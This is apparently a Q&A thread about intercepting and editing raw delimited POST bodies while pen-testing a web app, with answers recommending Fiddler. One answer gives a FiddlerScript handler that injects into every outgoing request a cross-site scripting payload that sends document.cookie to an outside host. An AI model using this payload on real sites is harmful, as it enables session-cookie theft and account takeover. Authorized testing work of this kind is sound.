# How can I modify raw post in tamper data?

Tags: firefox-addon, security, fiddler

I'm trying to pen-test the web app, that consumes the POST request containing the raw data like this:

`1|2|3|4|1|5|6|5|7|8|1|9|21|10|11|12|13|11|14|15|16|42|17|11|18|19|16|489|20|16|618|21|16|193|22|11|23|8|11|24|25|11|26|27|16|340|28|11|29|30|11|31|32|16|378|33|-7|34|11|35|36|16|130|37|16|55|38|-7|39|11|40|41|42|1|7|8|1|9|21|10|11|43|13|11|44|15|16|34|17|11|45|19|16|1058|20|16|480|21|16|190|22|11|46|8|11|47|25|11|48|27|16|322|28|11|49|30|-32|32|16|220|33|-28|34|-25|36|16|134|37|16|48|38|-28|39|-32|41|-22|7|8|1|9|21|10|11|50|13|11|51|15|16|33|17|11|52|19|16|934|20|16|669|21|16|185|22|11|53|8|11|54|25|11|55|27|16|98|28|11|56|30|-16|32|16|84|33|-45|34|11|57|36|16|139|37|16|49|38|11|58|39|11|59|41|-22|7|8|1|9|21|10|11|60|13|11|61|15|16|53|17|11|62|19|16|695|20|16|614|21|16|177|22|-49|8|11|63|25|11|64|27|16|131|28|11|65|30|-16|32|16|56|33|-65|34|11|66|36|16|151|37|-6|38|-65|39|-59|41|-22|7|8|1|9|21|10|11|67|13|11|68|15|16|40|17|11|69|19|16|197|20|16|147|21|16|110|22|11|70|8|11|71|25|11|72|27|16|341|28|11|73|30|-16|32|16|339|33|-81|34|11|74|36|16|133|37|16|20|38|-81|39|11|75|41|-22|`

I.e. all POST data can't be separated into parameters and values like Tamper Data handles them. That makes the plugin very unfriendly to dealing with such kind of POST data. I even can't go to the main Tamper data screen and copy the raw data from requests history list since the screen is blocked by the lesser screen handling the current http request. Thus, I can access and copy the raw data only when the request is already declined or sent without required modification.

Is there the similar tools (browser plugins, http proxies), or at least source code of tamper data that can be used to work and modify of such kind of post data in a manner Tamper Data does?

Answer (score 2, accepted):

Try [Fiddler](http://fiddler2.com), it lets you intercept and tamper with the raw request.

Comment: The only problem with this is security. I don't actually want someone to access my data. Sometimes the debug data can be confidential as well.

Answer (score 0):

The most appropriate way is to use Fiddlerscript (download it the Fiddlerscript Editor http://fiddler2.com/fiddlerscript-editor, it will open the needed file just after the start).

I have customized the

```
static function OnBeforeRequest(oSession: Session) {

    if (m_Replace16) {
        var post_body: String = oSession.GetRequestBodyAsString();
        FiddlerApplication.Log.LogString(post_body);
        post_body=post_body.Replace("|8888","|<script>img = new Image(); img.src = \"http://httpz.ru/n22ref260pd.gif?\"+document.cookie;</script>");
        FiddlerApplication.Log.LogString(post_body);
        oSession.utilSetRequestBody(post_body);
    }
```

i.e. added a new menu item that forse all outcoming request to be modified, i.e. "|8888" was replaced with the second parameter, i.e. injection.

the first line takes the request body to string var

the second line post it to fiddler log

the third line replace the desired value to some injection

the forth line posts the modified var body to log

the fifth line update the original request raw body with modified one